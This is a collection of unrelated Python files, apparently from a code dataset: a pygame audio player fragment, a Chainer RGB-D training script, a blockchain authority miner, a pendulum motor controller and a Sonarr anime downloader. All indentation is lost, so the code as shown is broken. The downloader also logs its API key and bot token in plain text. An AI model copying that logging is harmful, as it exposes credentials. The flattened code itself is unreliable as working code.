while True:
buf = os.read(pipe.stdout.fileno(), Music.offset())
total_buf = buf if not total_buf else total_buf + buf
if len(buf) == 0:
break
if self.channel:
# if queue becomes empty and our buffer has enough length, put it to the channel queue.
if self.channel and not self.channel.get_queue() and len(total_buf) - played_offset > Music.offset():
if not self.play_start_time:
self.play_start_time = datetime.datetime.now()
if offset_second:
self.play_start_time -= datetime.timedelta(seconds = int(offset_second), microseconds = math.fmod(offset_second,1) * 1000 * 1000)
print("started at %s (now=%s)"%(self.play_start_time, datetime.datetime.now()))
self.channel.queue(pygame.mixer.Sound(buffer=total_buf[played_offset:]))
#played_offset = len(total_buf)
total_buf = None
else:
pipe.stdout.close()
except ValueError as e:
print(e)
# Read all media. waitng until queue becomes empty.
# if not offset_second:
# self.cache = total_buf
while self.channel and self.channel.get_queue():
time.sleep(.1)
if self.channel:
self.channel.queue(pygame.mixer.Sound(buffer=total_buf[played_offset:]))
# All data is sent to the queue here.
while self.channel and self.channel.get_queue():
time.sleep(.1)
# Last sound chunk is sent to buffer
if self.channel and self.endevent:
self.channel.set_endevent(self.endevent)
if self.cache:
print("Using cache")
self.channel.queue(pygame.mixer.Sound(buffer=self.cache))
if self.channel and self.endevent:
self.channel.set_endevent(self.endevent)
return True
else:
if offset_second:
length = self.length()
if length < offset_second:
return False
self.thread = threading.Thread(target=play_async, args=(self.filename, offset_second))
self.thread.start()
return True
# pygame.mixer.music.set_endevent(SONG_END)
# pygame.mixer.music.play()
def length(self):
if self.filename.endswith(".wav"):
wav = wave.open(self.filename, 'r')
return wav.getnframes() / wav.getframerate()
else:
audio_info = mutagen.File(self.filename)
return audio_info.info.length
def played_offset(self):
if self.play_start_time:
diff = (datetime.datetime.now() if not self.paused_at else self.paused_at) - self.play_start_time
result = diff.seconds + diff.microseconds / float(1000 * 1000)
return result
return 0
def pause(self):
print("Pause")
if self.channel:
self.channel.pause()
self.paused_at = datetime.datetime.now()
def unpause(self):
print("Unpause")
if self.paused_at:
self.channel.unpause()
paused_duration = datetime.datetime.now() - self.paused_at
self.play_start_time += paused_duration
self.paused_at = None
def is_paused(self):
return self.paused_at != None
def seek(self, relative_sec):
current = self.played_offset()
print("Current played time=%f secs"%current)
if current:
start = current + relative_sec
print("Start play at %f sec"%start)
if start < 0:
start = None
return self.play(start)
def stop(self):
if self.channel:
self.clear()
while self.channel.get_queue() or self.channel.get_sound():
self.channel.get_sound().stop()
self.channel = None
if self.thread:
self.thread.join()
self.thread = None
self.played_time = None
# pygame.mixer.music.stop()
def clear(self):
if self.channel:
self.channel.set_endevent()
def rewind(self):
self.stop()
return self.play()
# pygame.mixer.music.rewind()
|
train_mdl.py
|
#!/usr/bin/env python
"""Example code of learning a RGB-D dataset by Multimodal Deep Learning model.
Prerequisite: To run this example, crop the center of ILSVRC2012 training and
validation images and scale them to 256x256, and make two lists of space-
separated CSV whose first column is full path to image and second column is
zero-origin label (this format is same as that used by Caffe's ImageDataLayer).
"""
from __future__ import print_function
import argparse
import datetime
import json
import multiprocessing
import os
import random
import sys
import threading
import time
import numpy as np
from PIL import Image
import six
import six.moves.cPickle as pickle
from six.moves import queue
import chainer
from chainer import computational_graph
from chainer import cuda
from chainer import optimizers
from chainer import serializers
import mdl_full
import mdl_rgb_d
parser = argparse.ArgumentParser(
description='Learning RGB-D dataset by Multimodal Deep Learning Model')
parser.add_argument('train', help='Path to training image-label list file')
parser.add_argument('val', help='Path to validation image-label list file')
parser.add_argument('--mean', '-m', default='mean.npy',
help='Path to the mean file (computed by compute_mean.py)')
'''
parser.add_argument('--arch', '-a', default='nin',
help='Convnet architecture \
(nin, alex, alexbn, googlenet, googlenetbn)')
'''
parser.add_argument('--batchsize', '-B', type=int, default=32,
help='Learning minibatch size')
parser.add_argument('--val_batchsize', '-b', type=int, default=250,
help='Validation minibatch size')
parser.add_argument('--epoch', '-E', default=10, type=int,
help='Number of epochs to learn')
parser.add_argument('--gpu', '-g', default=-1, type=int,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--loaderjob', '-j', default=20, type=int,
help='Number of parallel data loading processes')
parser.add_argument('--root', '-r', default='.',
help='Root directory path of image files')
parser.add_argument('--out', '-o', default='model',
help='Path to save model on each validation')
parser.add_argument('--outstate', '-s', default='state',
help='Path to save optimizer state on each validation')
parser.add_argument('--initmodel', default='',
help='Initialize the model from given file')
parser.add_argument('--resume', default='',
help='Resume the optimization from snapshot')
parser.add_argument('--test', dest='test', action='store_true')
parser.set_defaults(test=False)
args = parser.parse_args()
if args.gpu >= 0:
cuda.check_cuda_available()
xp = cuda.cupy if args.gpu >= 0 else np
assert 50000 % args.val_batchsize == 0
if args.test:
denominator = 1
else:
denominator = 100000
def load_image_list(path, root):
tuples = []
for line in open(path):
pair = line.strip().split()
tuples.append((os.path.join(root, pair[0]), np.int32(pair[1])))
return tuples
# Prepare dataset
train_list = load_image_list(args.train, args.root)
val_list = load_image_list(args.val, args.root)
mean_image = pickle.load(open(args.mean, 'rb'))
# Prepare model
model = mdl_full.MDL_full()
'''
if args.arch == 'nin':
import nin
model = nin.NIN()
elif args.arch == 'alex':
import alex
model = alex.Alex()
elif args.arch == 'alexbn':
import alexbn
model = alexbn.AlexBN()
elif args.arch == 'googlenet':
import googlenet
model = googlenet.GoogLeNet()
elif args.arch == 'googlenetbn':
import googlenetbn
model = googlenetbn.GoogLeNetBN()
else:
raise ValueError('Invalid architecture name')
'''
if args.gpu >= 0:
cuda.get_device(args.gpu).use()
model.to_gpu()
# Setup optimizer
optimizer = optimizers.MomentumSGD(lr=0.01, momentum=0.9) #TODO in literature, lr is reduced to 0.001 after 20K iterations
optimizer.setup(model)
# Init/Resume
if args.initmodel:
print('Load model from', args.initmodel)
serializers.load_npz(args.initmodel, model)
if args.resume:
print('Load optimizer state from', args.resume)
serializers.load_npz(args.resume, optimizer)
# ------------------------------------------------------------------------------
# This example consists of three threads: data feeder, logger and trainer.
# These communicate with each other via Queue.
data_q = queue.Queue(maxsize=1)
res_q = queue.Queue()
cropwidth = 256 - model.insize
def read_image(path, center=False, flip=False):
# Data loading routine
image = np.asarray(Image.open(path)).transpose(2, 0, 1)
if center:
top = left = cropwidth / 2
else:
top = random.randint(0, cropwidth - 1)
left = random.randint(0, cropwidth - 1)
bottom = model.insize + top
right = model.insize + left
image = image[:, top:bottom, left:right].astype(np.float32)
image -= mean_image[:, top:bottom, left:right]
image /= 255
if flip and random.randint(0, 1) == 0:
return image[:, :, ::-1]
else:
return image
def feed_data():
# Data feeder
i = 0
count = 0
x_batch = np.ndarray(
(args.batchsize, 3, model.insize, model.insize), dtype=np.float32)
y_batch = np.ndarray((args.batchsize,), dtype=np.int32)
val_x_batch = np.ndarray(
(args.val_batchsize, 3, model.insize, model.insize), dtype=np.float32)
val_y_batch = np.ndarray((args.val_batchsize,), dtype=np.int32)
batch_pool = [None] * args.batchsize
val_batch_pool = [None] * args.val_batchsize
pool = multiprocessing.Pool(args.loaderjob)
data_q.put('train')
for epoch in six.moves.range(1, 1 + args.epoch):
print('epoch', epoch, file=sys.stderr)
print('learning rate', optimizer.lr, file=sys.stderr)
perm = np.random.permutation(len(train_list))
for idx in perm:
path, label = train_list[idx]
batch_pool[i] = pool.apply_async(read_image, (path, False, True))
y_batch[i] = label
i += 1
if i == args.batchsize:
for j, x in enumerate(batch_pool):
x_batch[j] = x.get()
data_q.put((x_batch.copy(), y_batch.copy()))
i = 0
count += 1
if count % denominator == 0:
data_q.put('val')
j = 0
for path, label in val_list:
val_batch_pool[j] = pool.apply_async(
read_image, (path, True, False))
val_y_batch[j] = label
j += 1
if j == args.val_batchsize:
for k, x in enumerate(val_batch_pool):
val_x_batch[k] = x.get()
data_q.put((val_x_batch.copy(), val_y_batch.copy()))
j = 0
data_q.put('train')
optimizer.lr *= 0.97
pool.close()
pool.join()
data_q.put('end')
def log_result():
# Logger
train_count = 0
train_cur_loss = 0
train_cur_accuracy = 0
begin_at = time.time()
val_begin_at = None
while True:
result = res_q.get()
if result == 'end':
print(file=sys.stderr)
break
elif result == 'train':
print(file=sys.stderr)
train = True
if val_begin_at is not None:
begin_at += time.time() - val_begin_at
val_begin_at = None
continue
elif result == 'val':
print(file=sys.stderr)
train = False
val_count = val_loss = val_accuracy = 0
val_begin_at = time.time()
continue
loss, accuracy = result
if train:
train_count += 1
duration = time.time() - begin_at
throughput = train_count * args.batchsize / duration
sys.stderr.write(
'\rtrain {} updates ({} samples) time: {} ({} images/sec)'
.format(train_count, train_count * args.batchsize,
datetime.timedelta(seconds=duration), throughput))
train_cur_loss += loss
train_cur_accuracy += accuracy
if train_count % 1000 == 0:
mean_loss = train_cur_loss / 1000
mean_error = 1 - train_cur_accuracy / 1000
print(file=sys.stderr)
print(json.dumps({'type': 'train', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
train_cur_loss = 0
train_cur_accuracy = 0
else:
val_count += args.val_batchsize
duration = time.time() - val_begin_at
throughput = val_count / duration
sys.stderr.write(
'\rval {} batches ({} samples) time: {} ({} images/sec)'
.format(val_count / args.val_batchsize, val_count,
datetime.timedelta(seconds=duration), throughput))
val_loss += loss
val_accuracy += accuracy
if val_count == 50000:
mean_loss = val_loss * args.val_batchsize / 50000
mean_error = 1 - val_accuracy * args.val_batchsize / 50000
print(file=sys.stderr)
print(json.dumps({'type': 'val', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
def train_loop():
# Trainer
graph_generated = False
while True:
while data_q.empty():
time.sleep(0.1)
inp = data_q.get()
if inp == 'end': # quit
res_q.put('end')
break
elif inp == 'train': # restart training
res_q.put('train')
model.train = True
continue
elif inp == 'val': # start validation
res_q.put('val')
serializers.save_npz(args.out, model)
serializers.save_npz(args.outstate, optimizer)
model.train = False
continue
volatile = 'off' if model.train else 'on'
x = chainer.Variable(xp.asarray(inp[0]), volatile=volatile)
t = chainer.Variable(xp.asarray(inp[1]), volatile=volatile)
if model.train:
optimizer.update(model, x, t)
if not graph_generated:
with open('graph.dot', 'w') as o:
o.write(computational_graph.build_computational_graph(
(model.loss,)).dump())
print('generated graph', file=sys.stderr)
graph_generated = True
else:
model(x, t)
res_q.put((float(model.loss.data), float(model.accuracy.data)))
del x, t
# Invoke threads
feeder = threading.Thread(target=feed_data)
feeder.daemon = True
feeder.start()
logger = threading.Thread(target=log_result)
logger.daemon = True
logger.start()
train_loop()
feeder.join()
logger.join()
# Save final model
serializers.save_npz(args.out, model)
serializers.save_npz(args.outstate, optimizer)
|
authority.py
|
import copy
import json
from pprint import pprint
import time
from datetime import datetime
from multiprocessing import Process, Manager
from sys import getsizeof
from typing import List, Optional, Set, Tuple
import requests
import utils.constants as consts
from core import Block, BlockHeader, Chain, Transaction, Utxo
from utils.logger import logger
from utils.utils import compress, dhash, merkle_hash, get_time_difference_from_now_secs
from utils.contract import is_valid_contract_address
from wallet import Wallet
from vjti_chain_relayer import VJTIChainRelayer
from blockchain_vm_interface import BlockchainVMInterface
from authority_rules import authority_rules
def is_my_turn(wallet):
timestamp = datetime.now()
seconds_since_midnight = (timestamp - timestamp.replace(hour=0, minute=0, second=0, microsecond=0)).total_seconds()
for authority in authority_rules["authorities"]:
if seconds_since_midnight <= authority["to"] and seconds_since_midnight >= authority["from"]:
if wallet.public_key == authority["pubkey"]:
return True
return False
class Authority:
def __init__(self):
self.p: Optional[Process] = None
def is_mining(self):
if self.p:
if self.p.is_alive():
return True
else:
self.p = None
return False
def remove_utxo_of_tx(self, tx: Transaction, local_utxo: Utxo) -> Tuple[bool, str]:
for txIn in tx.vin.values():
so = txIn.payout
if so:
if local_utxo.get(so)[0] is not None:
local_utxo.remove(so)
return True, ""
else:
return False, f"Output {so} not in UTXO"
else:
return False, "txIn.payout does not exist"
def start_mining(self, mempool: Set[Transaction], chain: Chain, wallet: Wallet):
if not self.is_mining():
if is_my_turn(wallet):
if len(mempool) > consts.MINING_TRANSACTION_THRESHOLD or (
len(mempool) > 0
and abs(get_time_difference_from_now_secs(chain.header_list[-1].timestamp)) > consts.MINING_INTERVAL_THRESHOLD
):
vjti_chain_relayer = VJTIChainRelayer(wallet)
if not vjti_chain_relayer.chain_is_trusted(chain):
logger.error("Miner: Chain is not trusted")
return
logger.debug("Miner: Chain is trusted")
local_utxo = copy.deepcopy(chain.utxo)
manager = Manager()
mempool_list = manager.list()
def add_contract_tx_to_mempool(transaction) -> bool:
if transaction in mempool_list:
logger.debug(f"Tx {transaction} already exists in mempool")
return True
else:
ok, error_msg = self.remove_utxo_of_tx(transaction, local_utxo)
if ok:
mempool_list.append(transaction)
logger.info(f"Added tx {transaction} to mempool")
return True
else:
logger.error(f"Not adding contract tx {transaction} to mempool: {error_msg}")
return False
interface = BlockchainVMInterface(add_contract_tx_to_mempool)
for tx in [x for x in mempool]:
ok, error_msg = self.remove_utxo_of_tx(tx, local_utxo)
if not ok:
logger.error(f"Removing tx {tx} from mempool: {error_msg}")
mempool.remove(tx)
continue
if tx.contract_code != "":
contract_address = tx.get_contract_address()
if not is_valid_contract_address(contract_address):
logger.error(f"Removed tx {tx} from mempool: tx receiver address is invalid contract address")
mempool.remove(tx)
else:
try:
output = interface.run_contract_code(tx.contract_code, tx.contract_priv_key)
logger.debug(f"Output of contract {contract_address}: {output}")
for txn in mempool:
if txn.get_contract_address() == contract_address:
txn.contract_output = output
break
except Exception as e:
logger.error(f"Error while running code of contact: {contract_address}: {e}")
logger.error(f"Removed tx {tx} from mempool: Error while running contract code")
mempool.remove(tx)
mempool = mempool.union(mempool_list)
self.p = Process(target=self.__mine, args=(mempool, chain, wallet))
self.p.start()
logger.debug("Miner: Started mining")
def stop_mining(self):
if self.is_mining():
# logger.debug("Miner: Called Stop Mining")
self.p.terminate()
self.p = None
def __calculate_transactions(self, transactions: List[Transaction]) -> List[Transaction]:
i = 0
size = 0
mlist = []
while i < len(transactions) and size <= consts.MAX_BLOCK_SIZE_KB:
t = transactions[i]
mlist.append(t)
size += getsizeof(t.to_json())
i += 1
return mlist
def __mine(self, mempool: Set[Transaction], chain: Chain, wallet: Wallet) -> Block:
c_pool = list(copy.deepcopy(mempool))
mlist = self.__calculate_transactions(c_pool)
logger.debug(len(mlist))
block_header = BlockHeader(
version=consts.MINER_VERSION,
height=chain.length,
prev_block_hash=dhash(chain.header_list[-1]),
merkle_root=merkle_hash(mlist),
timestamp=int(time.time()),
signature="",
)
sign = wallet.sign(dhash(block_header))
block_header.signature = sign
block = Block(header=block_header, transactions=mlist)
r = requests.post("http://0.0.0.0:" + str(consts.MINER_SERVER_PORT) + "/newblock", data=compress(block.to_json()))
if r.text == "Block Received":
vjti_chain_relayer = VJTIChainRelayer(wallet)
vjti_chain_relayer.new_block(block)
logger.info(f"Miner: Mined Block with {len(mlist)} transaction(s)")
return block
else:
logger.info(f"Miner: Could not mine block with {len(mlist)} transaction(s)")
return None
|
__init__.py
|
from ....actuators.gyems import GyemsDRC
from ....sensors.can_sensors import CANSensors
from time import perf_counter, sleep
from math import pi
from multiprocessing import Process, Value, Event
from os import nice
class Pendulum:
""" This class provide interface to the Gyems BLDC motor driver over CAN socket"""
def __init__(
self,
can_bus=None,
device_id=0x141,
freq = 250,
):
self.actuator = {"motor": GyemsDRC(can_bus=can_bus, device_id=device_id),
"limit": 2000,
"angle_offset": 0,
"pos_offset": 0,
}
self.actuator["motor"].reset()
# print('test')
self.actuator["motor"].set_radians()
self.actuator["motor"].current_limit = self.actuator["limit"]
self.actuator["control"] = Value("d", 0)
self.actuator["torque_constant"] = 1
self.sensors_data = {}
self.state = {}
self.state_labels = {"time", "theta", "dtheta", "current", "torque", "temp"}
self.state = {}
for state in self.state_labels:
self.sensors_data[state] = Value("d", 0)
self.state[state] = 0
self.parameters = {}
self.to_home = True
self.T = 1/freq
# Array to store the processes
self.processes = []
self.exit_event = Event()
self.exit_event.clear()
def __del__(self):
self.stop()
print("Pendulum setup was deleted from memory")
def set_torque_constant(self, constant):
# TODO: move the actuator class
self.actuator["torque_constant"] = constant
def run(self):
"""Run the sensing and motor processes"""
self.processes.append(
Process(target=self.motor_process, args=(self.exit_event,))
)
print("Processes are about to start...")
for process in self.processes:
process.start()
if self.exit_event.is_set():
print('test')
for process in self.processes:
process.join()
def enable(self):
self.actuator["motor"].enable()
def disable(self):
self.actuator["motor"].disable()
def stop(self, delay = 0.0):
sleep(delay)
print("Processes are about to stop...")
self.exit_event.set()
if self.processes:
for process in self.processes:
process.terminate()
print("Processes are terminated...")
def motor_process(self, exit_event):
print("Motor procces is launched")
self.actuator["motor"].enable()
try:
t0 = perf_counter()
tc = 0
while True:
t = perf_counter() - t0
if (t - tc)>=self.T:
tc = t
u = self.actuator["control"].value
self.actuator["motor"].set_current(u)
self.sensors_data["time"].value = t
self.sensors_data["theta"].value = (self.actuator["motor"].state["angle"] - self.actuator["angle_offset"])
self.sensors_data["dtheta"].value = self.actuator["motor"].state["speed"]
self.sensors_data["current"].value = self.actuator["motor"].state["torque"]
self.sensors_data["temp"].value = self.actuator["motor"].state["temp"]
# self.sensors_data["current"].value = self.actuator["motor"].state["torque"]
except KeyboardInterrupt:
if self.to_home:
self.to_zero()
self.actuator["motor"].disable()
exit_event.set()
print("Exit motor process")
def to_zero(self):
while abs(self.actuator["motor"].state["angle"])>0.05:
self.actuator["motor"].set_angle(0, speed_limit = 200)
# sleep(0.5)
pass
def get_state(self):
for state in self.state_labels:
self.state[state] = self.sensors_data[state].value
return self.state
def set_control(self, control):
"""Update the value for controller with arguments"""
# TODO: think on what is appropriate argument
# for actuator in self.actuators_labels:
self.actuator["control"].value = control
|
main.py
|
#!/usr/bin/python3
import animeworld as aw
import requests
import os, re, json
from copy import deepcopy
import schedule
import time
import threading
import shutil
import logging.config
from app import app, ReadSettings
SETTINGS = ReadSettings()
SONARR_URL = os.getenv('SONARR_URL') # Indirizzo ip + porta di sonarr
API_KEY = os.getenv('API_KEY') # Chiave api di sonarr
CHAT_ID = os.getenv('CHAT_ID') # telegramm
BOT_TOKEN = os.getenv('BOT_TOKEN') # telegramm
SCHEDULE_MINUTES = SETTINGS["ScanDalay"] # Ripetizione
WARNC='\033[93m' #GIALLO
ALERTC='\033[91m' # ROSSO
ERRORC='\033[4;3;91m' # ROSSO
TITLEC='\033[1;94m' # BLU
SEPARC='\033[90m' # GRIGIO
DIVIDC='\033[1;90m' # GRIGIO
OKC='\033[92m' # VERDE
NC='\033[0m' # Ripristino
start = r"""{color}┌------------------------------------{time}------------------------------------┐
{color}| _ _____ _ _ |
{color}| /\ (_) | __ \ | | | | |
{color}| / \ _ __ _ _ __ ___ ___| | | | _____ ___ __ | | ___ __ _ __| | ___ _ __ |
{color}| / /\ \ | '_ \| | '_ ` _ \ / _ \ | | |/ _ \ \ /\ / / '_ \| |/ _ \ / _` |/ _` |/ _ \ '__| |
{color}| / ____ \| | | | | | | | | | __/ |__| | (_) \ V V /| | | | | (_) | (_| | (_| | __/ | |
{color}| /_/ \_\_| |_|_|_| |_| |_|\___|_____/ \___/ \_/\_/ |_| |_|_|\___/ \__,_|\__,_|\___|_| |
{color}| |
{color}└--------------------------------------------------------------------------------------------┘{nc}
""".format(time=time.strftime('%d %b %Y %H:%M:%S'), color=TITLEC, nc=NC)
def main():
LoadLog()
logging.warning(start)
if SONARR_URL is None:
logging.warning("✖️ Variabile d'ambinete '𝙎𝙊𝙉𝘼𝙍𝙍_𝙐𝙍𝙇' non inserita.")
else:
logging.info("✔ 𝙎𝙊𝙉𝘼𝙍𝙍_𝙐𝙍𝙇: {}".format(SONARR_URL))
if API_KEY is None:
logging.warning("✖️ Variabile d'ambinete '𝘼𝙋𝙄_𝙆𝙀𝙔' non inserita.")
else:
logging.info("✔ 𝘼𝙋𝙄_𝙆𝙀𝙔: {}".format(API_KEY))
if CHAT_ID is None:
logging.debug("✖️ Variabile d'ambinete '𝘾𝙃𝘼𝙏_𝙄𝘿' non inserita.")
else:
logging.info("✔ 𝘾𝙃𝘼𝙏_𝙄𝘿: {}".format(CHAT_ID))
if BOT_TOKEN is None:
logging.debug("✖️ Variabile d'ambinete '𝘽𝙊𝙏_𝙏𝙊𝙆𝙀𝙉' non inserita.")
else:
logging.info("✔ 𝘽𝙊𝙏_𝙏𝙊𝙆𝙀𝙉: {}".format(BOT_TOKEN))
if None not in (SONARR_URL, API_KEY):
logging.info(f"\n{OKC}☑️ Le variabili d'ambiente sono state inserite correttamente.{NC}\n")
logging.info(f"\n⚙️ Intervallo Scan: {SCHEDULE_MINUTES} minuti\n")
logging.info("\nAVVIO SERVER")
job_thread = threading.Thread(target=server)
job_thread.start()
job() # Fa una prima esecuzione e poi lo imposta per la ripetizione periodica
schedule.every(SCHEDULE_MINUTES).minutes.do(job)
def server():
os.system("gunicorn -w 2 --bind 0.0.0.0:5000 app:app > /dev/null 2>&1")
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
def job():
divider = f"{DIVIDC}- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - {NC}"
logging.warning("\n{color}╭-----------------------------------「{time}」-----------------------------------╮{nc}\n".format(time=time.strftime("%d %b %Y %H:%M:%S"), color=SEPARC, nc=NC))
try:
raw_series = get_missing_episodes()
if len(raw_series)!=0:
series = converting(raw_series)
for info in series:
logging.warning(f"\n{divider}")
try:
logging.warning("🔎 Ricerca anime '{}' per l'episodio S{}E{}.".format(info["SonarrTitle"], info["season"], info["rawEpisode"]))
anime = [aw.Anime(link=x) for x in info["AnimeWorldLinks"]]
logging.info("🔎 Ricerca degli episodi per '{}'.".format(info["SonarrTitle"]))
epsArr = [x.getEpisodes() for x in anime] # array di episodi da accorpare
episodi = fixEps(epsArr)
logging.info("⚙️ Verifica se l'episodio 𝐒{}𝐄{} è disponibile.".format(info["season"], info["rawEpisode"]))
ep = None
for episodio in episodi:
if episodio.number == str(info["episode"]):
ep = episodio
logging.info("✔️ L'episodio è disponibile.")
break
else:
logging.info("✖️ L'episodio NON è ancora uscito.")
if ep is not None: # Se l'episodio è disponibile
logging.warning("⏳ Download episodio 𝐒{}𝐄{}.".format(info["season"], info["rawEpisode"]))
title = f'{info["SonarrTitle"]} - S{info["season"]}E{info["rawEpisode"]}'
if ep.number == str(info["episode"]):
fileLink = ep.links[0]
title = fileLink.sanitize(title) # Sanitizza il titolo
if fileLink.download(title):
logging.info("✔️ Dowload Completato.")
if SETTINGS["MoveEp"]:
logging.info("⏳ Spostamento episodio 𝐒{}𝐄{} in {}.".format(info["season"], info["rawEpisode"], info["path"]))
if move_file(title, info["path"]):
logging.info("✔️ Episodio spostato.")
logging.info("⏳ Ricaricando la serie '{}'.".format(info["SonarrTitle"]))
RescanSerie(info["IDs"]["seriesId"])
if SETTINGS["RenameEp"]:
logging.info("⏳ Rinominando l'episodio.")
for i in range(5): # Fa 5 tentativi
try:
time.sleep(1)
epFileId = GetEpisodeFileID(info["IDs"]["epId"])
except KeyError:
continue
else:
RenameEpisode(info["IDs"]["seriesId"], epFileId)
break
else:
logging.warning(f"⚠️ NON è stato possibile rinominare l'episodio.")
if None not in (CHAT_ID, BOT_TOKEN):
logging.info("✉️ Inviando il messaggio via telegram.")
send_message(info)
except requests.exceptions.RequestException as res_error:
logging.warning(f"⚠️ Errore di connessione. ({res_error})")
except aw.AnimeNotAvailable as info:
logging.warning(f"⚠️ {info}")
except aw.ServerNotSupported as warning:
logging.error(f"{WARNC}🆆🅰🆁🅽🅸🅽🅶: {warning}{NC}")
except aw.DeprecatedLibrary as dev:
logging.critical(f"{ALERTC}🅰🅻🅴🆁🆃: {dev}{NC}")
finally:
logging.warning(f"\n{divider}")
else:
logging.info("\nNon c'è nessun episodio da cercare.\n")
except requests.exceptions.RequestException as res_error:
logging.error(f"🆆🅰🆁🅽🅸🅽🅶: Errore di connessione. ({res_error})")
except Exception as error:
logging.exception(f"{ERRORC}🅴🆁🆁🅾🆁: {error}{NC}")
nextStart = time.strftime("%d %b %Y %H:%M:%S", time.localtime(time.time() + SCHEDULE_MINUTES*60))
logging.warning("\n{color}╰-----------------------------------「{time}」-----------------------------------╯{nc}\n".format(time=nextStart, color=SEPARC, nc=NC))
def fixEps(epsArr): # accorpa 2 o più serie di animeworld
up = 0 # numero da aggiungere per rendere consecutivi gli episodi di varie stagioni
ret = []
for eps in epsArr:
for ep in eps:
if re.search(r'^\d+$', ep.number) is not None: # Episodio intero
ep.number = str(int(ep.number) + up)
ret.append(ep)
if re.search(r'^\d+\.\d+$', ep.number) is not None: # Episodio fratto
continue # lo salta perchè sicuramente uno speciale
if re.search(r'^\d+-\d+$', ep.number) is not None: # Episodio Doppio
ep1 = deepcopy(ep) # Duplica l'episodio da sitemare la gestione.....
ep2 = deepcopy(ep) # Non mi piace
ep1.number = str(int(ep.number.split('-')[0]) + up)
ep2.number = str(int(ep.number.split('-')[1]) + up)
ret.extend([ep1, ep2])
up += int(eps[-1].number)
return ret
def converting(series):
json_location = "/script/json/table.json"
if not os.path.exists(json_location):
logging.warning("⚠️ Il file table.json non esiste, quindi verrà creato.")
with open(json_location, 'w') as f:
f.write("[]")
try:
f = open(json_location, 'r')
table = json.loads(f.read())
f.close()
res = []
for anime in series:
for row in table:
if row["title"] == anime["SonarrTitle"]:
if row["absolute"]:
tmp = int(anime["episode"])
anime["episode"] = int(anime["rawEpisode"])
anime["rawEpisode"] = tmp
anime["AnimeWorldLinks"] = list(row["seasons"]["absolute"])
res.append(anime)
break
elif str(anime["season"]) in row["seasons"].keys():
anime["rawEpisode"] = int(anime["episode"])
anime["AnimeWorldLinks"] = list(row["seasons"][str(anime["season"])])
res.append(anime)
break
else:
logging.debug("❌ La 𝘴𝘵𝘢𝘨𝘪𝘰𝘯𝘦 {} della 𝘴𝘦𝘳𝘪𝘦 '{}' non esiste nella 𝗧𝗮𝗯𝗲𝗹𝗹𝗮 𝗗𝗶 𝗖𝗼𝗻𝘃𝗲𝗿𝘀𝗶𝗼𝗻𝗲.".format(anime["season"], anime["SonarrTitle"]))
except (json.decoder.JSONDecodeError, KeyError):
raise TableFormattingError
return res
def move_file(title, path):
file = title
if os.path.isfile(file+'.mp4'):
file = file + '.mp4'
elif os.path.isfile(file+'.mkv'):
file = file + '.mkv'
else:
return False
# destinationPath = os.fspath(path)
path = path.replace('\\', '/')
destinationPath = re.sub(r"\w:", "", path)
currentPath = os.getcwd()
source = os.path.join(currentPath, file)
destination = os.path.join(destinationPath, file)
if not os.path.exists(destinationPath):
os.makedirs(destinationPath)
logging.warning(f"⚠️ La cartella {destinationPath} è stata creata.")
shutil.move(source, destination)
return True
#### Sonarr ############################################################################################################
def get_missing_episodes():
series = []
endpoint = "wanted/missing"
page = 0
error_attempt = 0
while True:
try:
page += 1
res = requests.get("{}/api/{}?apikey={}&sortKey=airDateUtc&page={}".format(SONARR_URL, endpoint, API_KEY, page))
result = res.json()
# f = open("res.json", 'w')
# f.write(json.dumps(result, indent=4))
# f.close()
if len(result["records"]) == 0:
break
for serie in result["records"]:
try:
info = {}
info["IDs"] = {
"seriesId": serie["seriesId"],
"epId": serie["id"]
}
info["seriesId"] = serie["seriesId"]
info["SonarrTitle"] = serie["series"]["title"]
info["AnimeWorldLinks"] = [] # season 1 di sonarr corrisponde a più season di AnimeWorld
info["season"] = int(serie["seasonNumber"])
info["episode"] = int(serie["episodeNumber"])
info["rawEpisode"] = int(serie["absoluteEpisodeNumber"])
info["episodeTitle"] = serie["title"]
info["path"] = serie["series"]["path"]
except KeyError:
logging.debug("⁉️ Serie '{}' S{} scartata per mancanza di informazioni.".format(serie["series"]["title"], serie["seasonNumber"]))
else:
series.append(info)
except requests.exceptions.RequestException as res_error:
if error_attempt > 3: raise res_error
error_attempt += 1
logging.warning(f"⚠️ Errore di connessione, prossimo tentativo fra 10s. ({res_error})")
time.sleep(10)
return series
def RescanSerie(seriesId):
endpoint = "command"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
data = {
"name": "RescanSeries",
"seriesId": seriesId
}
requests.post(url, json=data)
def RenameSerie(seriesId):
endpoint = "command"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
data = {
"name": "RenameSeries",
"seriesIds": [seriesId]
}
requests.post(url, json=data)
def GetEpisode(epId):
endpoint = f"episode/{epId}"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
return requests.get(url)
def GetEpisodeFile(epFileId):
endpoint = f"episodefile/{epFileId}"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
return requests.get(url)
def RenameEpisode(seriesId, epFileId):
endpoint = "command"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
data = {
"name": "RenameFiles",
"seriesId": seriesId,
"files": [epFileId]
}
return requests.post(url, json=data)
### UTILS
def GetEpisodeFileID(epId): # Converte l'epId in epFileId
data = GetEpisode(epId).json()
return data["episodeFile"]["id"]
### LOG
def LoadLog():
logging.basicConfig(format='%(message)s')
logging.config.dictConfig({ 'version': 1, 'disable_existing_loggers': True, })
SetLog()
def SetLog():
LogLevel = SETTINGS["LogLevel"]
logging.getLogger().setLevel(LogLevel)
#### Telegram ###########################################################################################################
def send_message(info):
text = "*Episode Downloaded*\n{title} - {season}x{episode} - {episodeTitle}".format(title=info["SonarrTitle"], season=str(info["season"]), episode=str(info["episode"]), episodeTitle=info["episodeTitle"])
url ="https://api.telegram.org/bot{}/sendMessage?text={}&chat_id={}&parse_mode=Markdown".format(BOT_TOKEN, text, CHAT_ID)
requests.get(url)
if __name__ == '__main__':
main()
while True:
schedule.run_pending()
time.sleep(1)
### FLASK #######################
### ERRORI ####################################
# Problema alla formattazione del file table.json
class TableFormattingError(Exception):
def __init__(self):
self.message = "Errore al file table.json"
